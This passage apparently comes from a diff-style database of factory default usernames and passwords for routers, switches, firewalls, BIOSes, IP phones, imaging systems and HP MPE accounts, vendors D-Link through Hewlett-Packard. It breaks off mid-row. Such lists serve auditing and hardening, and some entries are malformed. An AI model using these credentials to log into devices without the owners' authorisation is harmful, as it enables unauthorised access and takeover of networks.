+dlink,DI-804HV,,http://192.168.0.1,admin,,Administration,, +dlink,DI-808HV,,http://192.168.0.1,admin,,Administration,, +dlink,DI-824VUP Airplus G Wireless VPN Router,,http://192.168.0.1,admin,,Administrator,, +dlink,DI-LB604,,http://192.168.0.1,admin,,Administration,, +dlink,DIR-130,,http://192.168.0.1,admin,,administrator,, +dlink,DIR-300,,192.168.0.1,admin,blank,administrator,, +dlink,DIR-300,,telnet 192.168.0.1,root,,shell,, +dlink,DIR-330,,http://192.168.0.1,admin,,administrator,, +dlink,DIR-450,,http://192.168.0.1,admin,,administrator,, +dlink,DIR-451,,http://192.168.0.1,admin,,administrator,, +dlink,DIR-615 ,3.01,192.168.01 ,,family,family,, +dlink,DIR-615,,http://192.168.0.1,admin,,administrator,, +dlink,DIR-615,Ver.1.10(I),http://192.168.0.1). ,Admin,,Admin,mantra88dotcom, +dlink,DIR-625,,http://192.168.0.1,admin,,administrator,, +dlink,DIR-635,,http://192.168.0.1,Admin,,Administration,, +dlink,DIR-655,,http://192.168.0.1,admin,,Administration,, +dlink,DIR-660,,http://192.168.0.1,admin,,Administration,, +dlink,DIR-855,,http://192.168.0.1,admin,,Administration,, +dlink,DKVM-16 16-port keyboard/video/mouse switch,,,,00000000,,, +dlink,DSL Router,,,root,admin,Administrator,, +dlink,DSL-2640T,1.00(1),192.168.I.I,88612421,2421D,ADMIN,ADMIN, +dlink,DSL-300,?,Telnet,,private,,, +dlink,DSL-300G+,7.1.0.30,Telnet,,private,admin?,, +dlink,DSL-300g+,Teo,HTTP,admin,admin,Admin,, +dlink,DSL-300g+,Teo,Telnet,,private,Admin,, +dlink,DSL-302G,,Multi,admin,admin,Admin,, +dlink,DSL-500,,Multi,admin,admin,Admin,, +dlink,DSL-504,,HTTP,,private,Admin,, +dlink,DSL-504T,,http://10.1.1.1,admin,admin,Admin,, +dlink,DSL-604+,,,admin,admin,Admin,, +dlink,DSL-G604T,,http://10.1.1.1,admin,admin,Admin,, +dlink,DSL-G624T,?,? via WAN ...,root,admin,Admin,, +dlink,DSL-G664T,A1,HTTP,admin,admin,Admin,SSID : G664T_WIRELESS, +dlink,DSL500G,,Multi,admin,admin,Admin,, +dlink,DWL-1000+,,HTTP,admin,,Admin,, +dlink,DWL-1000,,HTTP,admin,,Admin,, +dlink,DWL-1000AP+,,http://192.168.0.50,admin,,Admin,, +dlink,DWL-1700AP,,http://192.168.0.50:2000,admin,root,,, +dlink,DWL-1750,,http://192.168.0.50:2000,admin,root,,, +dlink,DWL-2000AP+,1.13,HTTP,admin,,Admin,Wireless Access Point, +dlink,DWL-2100AP,,AP Mgr or D-View Module or http://192.168.0.50,admin,,,, +dlink,DWL-210AP,1.03,Wireless,admin,,,, +dlink,DWL-2200AP,,AP Mgr or D-View Module or http://192.168.0.50,admin,,,, +dlink,DWL-2210AP,,http://192.168.0.50,admin,admin,,, +dlink,DWL-2700AP,,MIB or AP Mgr or D-View Module or http://192.168.0.50,admin,,,, +dlink,DWL-3150,,http://192.168.0.30,admin,,Administration,default SSID is 'dlink', +dlink,DWL-3200AP,,AP Mgr or D-View Module or http://192.168.0.50,admin,,,, +dlink,DWL-3200AP,,http://192.168.1.199,,,admin,, +dlink,DWL-5000AP,,http://192.168.0.50,admin,,,, +dlink,DWL-6000AP,Rev.A and Rev.B,multi interfaces incl. http://192.168.0.50,admin,,,, +dlink,DWL-614+,2.03,HTTP,admin,,Admin,, +dlink,DWL-614+,rev a rev b,HTTP,admin,,Admin,http://192.168.0.1, +dlink,DWL-7000AP,,http://192.168.0.50 or AP Mgr,admin,,,, +dlink,DWL-700AP,,http://192.168.0.50,admin,,Admin,, +dlink,DWL-7100AP,,http://192.168.0.50,admin,,Administration,, +dlink,DWL-7200AP,,http://192.168.0.50,admin,,Administration,, +dlink,DWL-7700AP,Rev. A and Rev. B,mutli console,admin,,Administration,default IP 192.168.0.50, +dlink,DWL-810+,,http://192.168.0.30,admin,,Admin,, +dlink,DWL-810,,http://192.168.0.30,admin,,Admin,, +dlink,DWL-8200AP,,multi console,admin,,,default IP 192.160.0.50, +dlink,DWL-8200AP,,multi console,admin,,,default IP 192.168.0.50 (/! Previous indication in the page is false!), +dlink,DWL-900+,,HTTP,admin,,Admin,, +dlink,DWL-900,,,admin,public,Admin,, +dlink,DWL-900AP+,,,Admin,1970,,, +dlink,DWL-900AP+,rev a rev b rev c,HTTP,admin,,Admin,http://192.168.0.50, +dlink,DWL-900AP,,Multi,,public,Admin,, +dlink,DWL-900AP,,Multi,admin,public,Admin,, +dlink,DWL-900AP,,USB/SNMP,,public,Admin,default IP 192.168.0.20, +dlink,DWL-AG700AP,,http://192.168.0.50,admin,,Administration,, +dlink,DWL-G700AP,,HTTP,admin,,,, +dlink,DWL-G700AP,,http://192.168.0.50/,admin,olinda,,, +dlink,DWL-G710,,http://192.168.0.30,admin,,Administration,, +dlink,DWL-G730AP,,http://192.168.0.30,admin,,Administration,, +dlink,DWL-G800AP,,http://192.168.0.30,admin,,Administration,, +dlink,DWL-G820,,http://192.168.0.35,admin,,Administration,, +dlink,EBR-2310,,http://192.168.0.1,admin,,Administration,, +dlink,WBR-1310,,http://192.168.0.1,admin,,Administration,, +dlink,WBR-2310,,http://192.168.0.1,admin,,Administration,, +dlink,WBR-2310,revB,http://192.168.0.1,admin,,Administration,, +dlink,Windows XP,Windows XP,192.168.0.1,admin,password,admin,amdin, +dlink,hubs/switches,,Telnet,D-Link,D-Link,,, +dlink,wbr-2310,a1 1.02,192.168.0.1,D Link 25,,,, +dlink,windows xp,all,192.168.0.1,admin,,,, +draytek,Vigor 2200 USB,,,admin,,Admin,, +draytek,Vigor 2600 Plus Series,Annex A,HTTP,admin,,Admin,, +draytek,Vigor 2600,,HTTP,admin,,Admin,, +draytek,Vigor 2900+,,HTTP,admin,admin,Admin,, +draytek,Vigor,all,HTTP,admin,admin,Admin,, +dreambox,All models,all versions,http, telnet,root,dreambox,, +drupal.org,Drupal,,administrator,admin,admin,,, +dupont,Digital Water Proofer,,,root,par0t,,, +dynalink,RTA020,,,admin,private,,, +dynalink,RTA020,,Admin,admin,private,,, +dynalink,RTA020,,Multi,admin,private,Admin,, +dynalink,RTA1025W,,console,http//192.168.1.1,admin,admin,, +dynalink,RTA1320,,console,http//192.168.1.1,admin,admin,, +dynalink,RTA1335,,console,http//192.168.1.1,admin,admin,, +dynalink,RTA230,,,userNotUsed,userNotU,,, +dynalink,RTA230,,,userNotUsed,userNotU,Admin,, +dynalink,RTA230,,Multi,admin,admin,Admin,, +dynamode,BR-6004,,http,guest,guest,Standard admin access,, +dynix library systems,Dynix,,,LIBRARY,,,, +dynix library systems,Dynix,,,SETUP,,,, +dynix library systems,Dynix,,,circ,,,, +dynix library systems,Dynix,,,circ,,,, +dynix library systems,Dynix,,Admin,SETUP,,,, +dynix library systems,Dynix,,User,LIBRARY,,,, +dynixlibrarysystems,Dynix,,Multi,LIBRARY,,User,, +dynixlibrarysystems,Dynix,,Multi,SETUP,,Admin,, +dynixlibrarysystems,Dynix,,Multi,circ,(social security number),User,, +e-tech,Router,,Admin,,admin,,, +econ,Econ DSL Router,,Router,admin,epicrouter,Admin,DSL Router, +edimax,.,,,admin,1234,,, +edimax,.,,Multi,admin,1234,,, +edimax,6114wg,1.83,192.168.2.1,admin,1234,,, +edimax,7205APL,,,guest,1234,,, +edimax,7205APL,,,guest,1234,Guest - allows backup of config.bin,attacker can gain all passwords, +edimax,AR-6004,,,admin,1234,,, +edimax,AR-7024,,,admin,epicrouter,,, +edimax,AR-7024WG,,Default IP: 10.0.0.2,admin,epicrouter,Admin,, +edimax,AR-7024Wg,,Admin,admin,epicrouter,,, +edimax,AR-7084A,,192.168.2.1,admin,1234,Admin,, +edimax,AR-7084gA,3.0A,http://192.168.2.1,admin,1234,Admin,, +edimax,BR 4000+ Router,,,admin,password,,, +edimax,BR 4000+ Router,all,HTTP,admin,password,,, +edimax,BR-6204WG,,Default IP: 192.168.2.1,admin,1234,,, +edimax,BR-7209WG,,Default IP: 192.168.2.1,admin,1234,,, +edimax,Broadband Router,Hardware: Rev A. Boot Code: 1.0 Runtime Code 2.63,HTTP,admin,1234,Admin,, +edimax,ES-5224RXM,,Multi,admin,123,Admin,, +edimax,EW-7205APL,Firmware release 2.40a-00,Multi,guest,,Admin,, +edimax,Wireless ADSL Router,AR-7024,Multi,admin,epicrouter,Admin,, +edimax,br-6204,wg,http://192.168.2.1,admin,1234,admin,, +efficient networks,5851 SDSL Router,,,,hs7mwxkk,,, +efficient networks,5851 SDSL Router,,Admin,,hs7mwxkk,,, +efficient networks,EN 5861,,,login,admin,,, +efficient networks,EN 5861,,Admin,login,admin,,, +efficient networks,Speedstream 5711,,Admin,,4getme2,,, +efficient networks,Speedstream 5711,,Teledanmark version (only .dk),,4getme2,,, +efficient,5871 DSL Router,,Admin,login,admin,,, +efficient,5871 DSL Router,,v 5.3.3-0,login,admin,,, +efficient,Speedstream DSL,,,,admin,,, +efficient,Speedstream DSL,,Admin,,admin,,, +efficientnetworks,5800 Class DSL Routers,all,Multi,login,admin,Admin,, +efficientnetworks,5851 SDSL Router,N/A,Console,,hs7mwxkk,Admin,On some Covad Routers, +efficientnetworks,5851,,Telnet,login,password,Admin,might be all 5800 series, +efficientnetworks,5871 DSL Router,v 5.3.3-0,Multi,login,admin,Admin,, +efficientnetworks,5871 DSL Router,v 5.3.3-0,Multi,login,admin,Admin,This is for access to HTTP admin console., +efficientnetworks,EN 5861,,Telnet,login,admin,Admin,, +efficientnetworks,Speedstream DSL,,Telnet,,admin,Admin,, +efficientnetworks,Speedstream,5200,http/telnet,,,,Default IP 10.0.0.1/8, +efficientnetworks,Speedstream,5600,http/telnet,,,,Default IP 10.0.0.1/8, +efficientnetworks,Speedstream,5711 Teledanmark version (only .dk),Console,,4getme2,Admin,, +efficientnetworks,Speedstream,57xx series,http/telnet,login,admin,,Default IP 192.168.254.254/24, +efficientnetworks,Speedstream,59xx series,http/telnet,login,admin,,Default IP 192.168.254.254/24, +efficientnetworks,Speedstream,various,http/telnet,superuser,admin,Admin,, +efficinet networks,5800 Class DSL Routers,,Admin,login,admin,,, +efficinet networks,5800 Class DSL Routers,,all,login,admin,,, +egenera,all models,all version,http, ssh, console,root,root, +elron,Firewall,,,(hostname/ipaddress),sysadmin,,, +elronsoftware,Elron Firewall,2.5c,,hostname/ip address,sysadmin,Admin,, +elsa,LANCom Office ISDN Router,,800/1000/1100,,,,, +elsa,LANCom Office ISDN Router,,Admin,,,,, +elsa,LANCom Office ISDN Router,,Admin,,cisco,,, +elsa,LANCom Office ISDN Router,1000,Telnet,,,Admin,, +elsa,LANCom Office ISDN Router,1000,Telnet,,cisco,Admin,, +elsa,LANCom Office ISDN Router,1100,Telnet,,,Admin,, +elsa,LANCom Office ISDN Router,1100,Telnet,,cisco,Admin,, +elsa,LANCom Office ISDN Router,800,Telnet,,,Admin,, +elsa,LANCom Office ISDN Router,800,Telnet,,cisco,Admin,, +emachines,notebook,,,emaq,4133,,, +eminent,EM4114,,,admin,admin,Administrator,, +encad,XPO,,,,,,, +encad,XPO,,Admin,,,,, +encad,XPO,,Multi,,,Admin,, +enhydra,Multiserver,,,admin,enhydra,,, +enhydra,Multiserver,,,admin,enhydra,Admin,, +enox,PC BIOS,,,,xo11nE,,, +enox,PC BIOS,,Admin,,xo11nE,,, +enox,PC BIOS,,Console,,xo11nE,Admin,, +enterasys,ANG-1105,,Admin,,netadmin,,, +enterasys,ANG-1105,,Admin,admin,netadmin,,, +enterasys,ANG-1105,,unknown,,netadmin,,, +enterasys,ANG-1105,,unknown,admin,netadmin,,, +enterasys,ANG-1105,unknown,HTTP,admin,netadmin,Admin,default IP is 192.168.1.1, +enterasys,ANG-1105,unknown,Telnet,,netadmin,Admin,default IP is 192.168.1.1, +enterasys,Vertical Horizon,ANY,Multi,admin,,Admin,this works in telnet or http, +enterasys,Vertical Horizon,VH-2402S,Multi,tiger,tiger123,Admin,, +entrust,Get Access Service Control Agent,,4.x,admin,admin,,, +entrust,GetAccess,4.x,http,admin,admin,Admin,, +entrust,GetAccess,4.x,http,websecadm,changeme,Admin,Access to Admin Gui via /sek-bin/login.gas.bat, +entrust,GetAccess,7.x,http,websecadm,changeme,Admin,Access to Admin Gui via /sek-bin/login.gas.bat, +epox,PC BIOS,,,,central,,, +epox,PC BIOS,,Admin,,central,,, +epox,PC BIOS,,Console,,central,Admin,, +ericsson,ACC,,,netman,netman,,, +ericsson,Any router,,,netman,netman,,all, +ericsson,Ericsson ACC,,,netman,netman,,, +ericsson,Ericsson ACC,,Multi,,,Admin,, +ericsson,Ericsson Acc,,,netman,netman,,, +ericsson,Tigris Platform,All,Multi,public,,Guest,, +ericsson,W20,,,user,user,,, +ericsson,md110 pabx,,up-to-bc9,,help,,, +ericsson,md110 pabx,,varies depending on config minimal list access by default,,help,,, +ericsson,md110 pabx,up-to-bc9,Multi,,help,varies depending on config minimal list access by default,, +esesixcomputergmbh,Thintune,2.4.38-32-D,Connect port 25072,root,jstwo,Admin,, +etech,ADSL Ethernet Router,Annex A v2,HTTP,admin,epicrouter,Admin,Password can also be password, +etech,Router,RTBR03,HTTP,,admin,Admin,1wan/4ports switch router, +etech,Router,v1,HTTP,,admin,Admin,, +etech,Wireless 11Mbps Router Model:WLRT03,,HTTP,,admin,Admin,, +etech,rtbr03,rtbr03,Admin,admin,admin,,, +everfocus,ECOR 8F,,,admin,11111111,,, +everfocus,PowerPlex,,Admin,admin,admin,,, +everfocus,PowerPlex,,Admin,operator,operator,,, +everfocus,PowerPlex,,Admin,supervisor,supervisor,,, +everfocus,PowerPlex,,EDR1600,admin,admin,,, +everfocus,PowerPlex,,EDR1600,operator,operator,,, +everfocus,PowerPlex,,EDR1600,supervisor,supervisor,,, +everfocus,PowerPlex,EDR1600,Multi,admin,admin,Admin,, +everfocus,PowerPlex,EDR1600,Multi,operator,operator,Admin,, +everfocus,PowerPlex,EDR1600,Multi,supervisor,supervisor,Admin,, +everfocus,edsr400,,,Admin,admin,,, +exabyte,Magnum20,,FTP,anonymous,Exabyte,Admin,, +exindanetworks,1700,,Default login http://172.14.1.57,admin,exinda,Admin,, +extended systems,Firewall,,,admin,admin,,, +extended systems,Print Server,,,admin,extendnet,,, +extendedsystems,ExtendNet 4000 / Firewall,,,admin,admin,,all Versions, +extendedsystems,Print Servers,,,admin,extendnet,,, +extreme networks,All Switches,,,admin,,,, +extreme networks,All Switches,,Admin,admin,,,, +extreme networks,Alpine,,,admin,,,, +extreme networks,BlackDiamond,,,admin,,,, +extreme networks,Summit,,,admin,,,, +extreme networks,Switches,,,admin,,,, +extreme networks,Switches,,Admin,admin,,,, +extreme networks,Swithces,,,admin,,,, +extreme networks,Swithces,,Admin,admin,,,, +extremenetworks,All Switches,,Multi,admin,,Admin,, +extremenetworks,Alpine,,,admin,,Admin,, +extremenetworks,BlackDiamond,,,admin,,Admin,, +extremenetworks,Summit,,,admin,,Admin,, +extremenetworks,Switches,,,admin,,Admin,, +extremenetworks,Swithces,,Multi,admin,,Admin,, +f5,Big-IP 540,,Multi,root,default,Admin,, +f5,Big-IP,9.12,http,admin,admin,Administrator,, +fastwire,Fastwire Bank Transfer,,,fastwire,fw,,, +firebird,FirebirdSQL,,,SYSDBA,masterkey,,, +flowpoint,100 IDSN,,,admin,admin,,, +flowpoint,100 IDSN,,Admin,admin,admin,,, +flowpoint,100 IDSN,,Telnet,admin,admin,Admin,, +flowpoint,2200 SDSL,,,admin,admin,,, +flowpoint,2200 SDSL,,Admin,admin,admin,,, +flowpoint,2200 SDSL,,Telnet,admin,admin,Admin,, +flowpoint,40 IDSL,,,admin,admin,,, +flowpoint,40 IDSL,,Admin,admin,admin,,, +flowpoint,40 IDSL,,Telnet,admin,admin,Admin,, +flowpoint,DSL,,,,password,,, +flowpoint,DSL,,2000,admin,admin,,, +flowpoint,DSL,,Admin,,password,,, +flowpoint,DSL,,Admin,admin,admin,,, +flowpoint,DSL,,Telnet,,password,Admin,Installed by Covad, +flowpoint,DSL,2000,Telnet,admin,admin,Admin,, +flowpoint,Flowpoint DSL,,,admin,admin,Admin,, +flowpoint,Flowpoint/2000 ADSL,,,,,,, +flowpoint,Flowpoint/2000 ADSL,,Admin,,,,, +flowpoint,Flowpoint/2000 ADSL,,Telnet,,,Admin,, +fortigate,Fortinet firewall,,,admin,no password,,, +fortinet,FortiGate 300A,n/d,Multi,admin,no password,HTTP,, +fortinet,FortiGate firewall,,Multi,admin,no password,,, +fortinet,FortiGate,,Telnet,admin,,Admin,, +fortinet,FortiGate,,serial console,maintainer,pbcpbn(add serial number),Admin,, +fortinet,Fortigate 300A,,HTTP SSH,admin,no password,,, +foundry networks,IronView Network Manager,,Version 01.6.00a(service pack) 0620031754,admin,admin,,, +foundry networks,ServerIron,,,,,,, +foundrynetworks,IronView Network Manager,Version 01.6.00a(service pack) 0620031754,HTTP,admin,admin,Admin,, +foundrynetworks,ServerIron,,,,,Admin,, +freetech,PC BIOS,,,,Posterie,,, +freetech,PC BIOS,,Admin,,Posterie,,, +freetech,PC BIOS,,Console,,Posterie,Admin,, +fujitsusiemens,Routers,,HTTP,,connect,Admin,, +fujixerox,DocuPrint 3055,200911121222,http://10.0.14.50,,,admin,, +fujixerox,Document Centre C450,,console,11111,x-admin,,http://www.support.xerox.com/SRVS/CGI-BIN/WEBCGI.EXE/, +funk software,Steel Belted Radius,,3.x,admin,radius,,, +funk software,Steel Belted Radius,,Admin,admin,radius,,, +funksoftware,Steel Belted Radius,3.x,Proprietary,admin,radius,Admin,, +funksoftware,Steel Belted Radius,450,,admin,radius,Admin,, +galacticomm,Major BBS,,,Sysop,Sysop,,, +galacticomm,Major BBS,,Admin,Sysop,Sysop,,, +galacticomm,Major BBS,,Multi,Sysop,Sysop,Admin,, +gandalf,XMUX,,,,console,,, +gandalf,XMUX,,,,gandalf,,, +gandalf,XMUX,,,,system,,, +gandalf,XMUX,,,,xmux,,, +gateway,WGR-200 Router,,,admin,admin,Admin,, +gateway,WGR-250 Router,,,admin,admin,Admin,, +ge,Data management system,,,administrator,Never!Mind,,, +ge,Data management system,,,museadmin,Muse!Admin,,, +ge,Data management system,1/2/3,Console,administrator,Never!Mind,,, +ge,Data management system,1/2/3,Console,museadmin,Muse!Admin,,, +ge,Enterprise Archive,,,administrator,eaadmin,,, +ge,Enterprise Archive,1/2,Console,administrator,eaadmin,,, +ge,Image management system,,,administrator,gemnet,,, +ge,Image management system,1/2/3,Console,administrator,gemnet,,, +ge,Maclab,,,mlcltechuser,mlcl!techuser,,, +ge,Maclab,1,Console,mlcltechuser,mlcl!techuser,,, +geeklog,Geeklog,,1.3.x,username,password,,, +geeklog,Geeklog,1.3.x,MySQL,username,password,,, +general instruments,Cable Modem,,,test,test,,, +generalinstruments,SB2100D Cable Modem,,,test,test,,, +gericom,Phoenix,,Multi,Administrator,,Admin,, +giga,8ippro1000,,Multi,Administrator,admin,Admin,, +gigabyte,GN-B49G,,,admin,admin,,, +gigabyte,GN-B49G,,HTTP,admin,admin,,, +gigabyte,GN-BR01G,,ip address,admin,admin,,, +glftpd,glftpd,1.32,Other,glftpd,glftpd,ftp,, +globespanvirata,GS8100,,,DSL,DSL,Admin,, +globespanvirata,Viking,,Telnet,root,root,admin,, +globespanvirata,Viking,,admin,root,root,,, +globespanvirata,all models,all versions,http://192.168.1.1,WebAdmin,,,, +gonet,,,,fast,abd234,,, +gossamerthreads,dbMan,,,admin,admin,Change/Delete Data in Database,, +gossamerthreads,dbMan,,,author,author,Change/Delete Data in Database,, +gossamerthreads,dbMan,,,guest,guest,Change/Delete Data in Database,, +grandstreamnetworks,GXV-3000 IP Video Phone,1.0.0.24,,,123,Config (End User),, +grandstreamnetworks,GXV-3000 IP Video Phone,1.0.0.24,,,admin,Config (Advanced User),, +grandstreamnetworks,HandyTone 286,,HTTP,Administrator,admin,Admin,, +grandstreamnetworks,HandyTone 286,,HTTP,End User,,,, +grandstreamnetworks,HandyTone 286,,HTTP,End User,123,,, +grandstreamnetworks,HandyTone 386,,HTTP,Administrator,admin,Admin,, +grandstreamnetworks,HandyTone 386,,HTTP,End User,,,, +grandstreamnetworks,HandyTone 386,,HTTP,End User,123,,, +grandstreamnetworks,HandyTone 486,,HTTP,Administrator,admin,Admin,, +grandstreamnetworks,HandyTone 486,,HTTP,End User,,,, +grandstreamnetworks,HandyTone 486,,HTTP,End User,123,,, +grandstreamnetworks,HandyTone 488,,HTTP,Administrator,admin,Admin,, +grandstreamnetworks,HandyTone 488,,HTTP,End User,,,, +grandstreamnetworks,HandyTone 488,,HTTP,End User,123,,, +grandstreamnetworks,HandyTone 496,,HTTP,Administrator,admin,Admin,, +grandstreamnetworks,HandyTone 496,,HTTP,End User,,,, +grandstreamnetworks,HandyTone 496,,HTTP,End User,123,,, +grandstreamnetworks,HandyTone Budgetone-100 IP Phone,,HTTP,,admin,administrator,, +grandstreamnetworks,HandyTone GXP-2000,,HTTP,Administrator,admin,Admin,, +grandstreamnetworks,HandyTone GXP-2000,,HTTP,End User,,,, +grandstreamnetworks,HandyTone GXP-2000,,HTTP,End User,123,,, +greatspeed,DUO,,,admin,broadband,,, +greatspeed,DUO,,HTTP,admin,broadband,,, +guardone,BizGuard,,,n.a,guardone,,, +guardone,BizGuard,,multi,,guardone,Admin,, +guardone,Restrictor,,,,guardone,,, +guardone,Restrictor,,multi,,guardone,Admin,, +gvc,e800/rb4,,HTTP,Administrator,admin,Admin,, +h2o project,Medialibrary,,,admin,admin,,, +h2oproject,Medialibrary,,HTTP,admin,admin,Admin,, +harris,DATU,,DTMF,,1111,,, +harris,DATU,,DTMF,,1234,,, +harris,DATU,,DTMF,,2345,,, +harris,DATU,,DTMF,,4300,,, +harris,DATU,,DTMF,,7373,,, +harris,MAU,,Modem,,4372266,,, +harris,SASS,,DTMF,,1111,,, +harris,SASS,,DTMF,,1122,,, +hawlett-packard,HP Omnibook 2100,,,,,,, +hayes,Century,,MR200,system,isp,,, +hayes,Century,MR200,,system,isp,Admin,, +hewlett-packard,CommandView SDM,,Secure Manager,,AUTORAID,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,ADVMAIL,HP,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,ADVMAIL,HPOFFICE DATA,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,HPONLY,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,HPP187 SYS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,HPWORD PUB,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,LOTUS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,MANAGER,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,MGR,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,SERVICE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,SUPPORT,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,HELLO,FIELD.SUPPORT,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,HELLO,MANAGER.SYS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,HELLO,MGR.SYS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,HELLO,OP.OPERATOR,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,HPOFFICE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,MAIL,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,MPE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,REMOTE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,TELESUP,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,COGNOS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,HPOFFICE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,ITF3000,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,SECURITY,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,SYS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,TCH,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,TELESUP,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGE,VESOFT,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,CAROLIAN,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,CCC,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,CNAS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,COGNOS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,CONV,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPDESK,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPOFFICE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPONLY,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPP187,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPP189,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPP196,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,INTX3,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,ITF3000,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,NETBASE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,REGO,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,RJE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,ROBELLE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,SECURITY,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,SYS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,TELESUP,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,VESOFT,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,WORD,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,MGR,XLSERVER,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,COGNOS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,DISC,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,SUPPORT,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,SYS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,SYSTEM,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,PCUSER,SYS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,RSBCMON,SYS,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,SPOOLMAN,HPOFFICE,,, +hewlett-packard,HP 2000/3000 MPE/xx,,,WP,HPOFFICE,,, +hewlett-packard,LaserJet Net Printers,,Admin,,,,, +hewlett-packard,LaserJet Net Printers,,Ones with Jetdirect on them,,,,, +hewlett-packard,LaserJet Net Printers,,Ones with Jetdirect on them,Anonymous,,,, +hewlett-packard,LaserJet Net Printers,,User,,,,, +hewlett-packard,LaserJet Net Printers,,User,Anonymous,,,, +hewlett-packard,Vectra,,,,hewlpack,,, +hewlett-packard,Vectra,,Admin,,hewlpack,,, +hewlett-packard,Webmin,,0.84,admin,hp.com,,, +hewlettpackard,CommandView SDM,,Multi,N/A,AUTORAID,Secure Manager,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,ADVMAIL,,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,ADVMAIL,HP,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,ADVMAIL,HPOFFICE DATA,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPONLY,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPP187 SYS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPWORD PUB,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,LOTUS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,MANAGER,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,MGR,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,SERVICE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,SUPPORT,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,HELLO,FIELD.SUPPORT,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,HELLO,MANAGER.SYS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,HELLO,MGR.SYS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,HELLO,OP.OPERATOR,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,HPOFFICE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,MAIL,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,MPE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,REMOTE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,TELESUP,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,COGNOS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,HPOFFICE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,ITF3000,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,SECURITY,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,SYS,,, +hewlettpackard,HP 2000/3000 